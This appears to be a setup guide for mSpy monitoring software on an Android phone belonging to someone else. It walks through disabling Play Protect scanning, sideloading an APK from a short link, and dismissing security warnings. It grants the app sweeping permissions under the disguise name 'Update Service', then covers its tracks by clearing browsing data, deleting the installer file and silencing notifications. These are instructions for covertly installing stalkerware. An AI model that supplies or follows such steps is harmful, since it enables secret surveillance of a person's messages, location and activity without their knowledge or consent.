Disable PlayProtect on the device you want to monitor
1. Go to 'Play Store'.
2. Tap 'Menu button' (three lines in the top left corner).
3. Find and tap 'Play Protect'.
4. 'Settings (cogwheel)'.
5. Disable 'Scan device for security threats'.
Download mSpy installer
1. 'Open a browser' (Chrome).
2. Tap on the address bar.
3. Enter the link 'b55y.net/a' and press 'Go'.
4. Draw the shape, once successful click 'Download' → 'Ok'.
5. Hit 'Open' → 'Settings' → 'Allow from this source'.
6. Go back → hit 'Install' → 'Open'.
7. If a security prompt appears, tick 'Don't remind me again' and tap 'Ignore'.
1. Tap 'Allow' for all permissions.
2. Tap 'Ok' → turn on the toggle on the next screen.
3. Tap 'Ok' → enable 'Framework update service'.
4. Tap 'Ok' → 'Update Service' → enable 'Allow usage tracking'.
5. Tap 'Ok' ⭢ 'Start now'.
6. Tap 'Ok'. Tap 'Not allowed' → 'All'. Find and tap 'Update Service' → 'Don't allow'.
7. Tap 'Ok' ⭢ Turn off the first toggle.
8. Click on the area above 'Complete installation' and enter the registration code. Here is how you can find the Registration code.
9. Press 'Complete installation'.
10. Go to 'Settings' ⭢ 'Apps' ⭢ 'Google Play Store' ⭢ 'Notifications'. Turn off the first toggle.
1. Go to 'Chrome' → tap on three dots → 'Settings'.
2. Go to 'Privacy' → 'Clear browsing data' → 'Clear data'.
3. Go to the home screen and find an app called 'Files'.
4. Go to 'Internal storage' → 'Download'→ delete 'bt.apk'.
Add mSpy to Unmonitored apps
1. Go to ‘Settings’
2. Tap ‘Battery’ → ‘App Launch’
3. Find and disable ‘Update Service’
4. After that, you will see a pop-up notification; allow all three of the options.
Turn on Location
Touch the screen in two places and pull down the extended menu from the top of the screen → 'Enable Location'.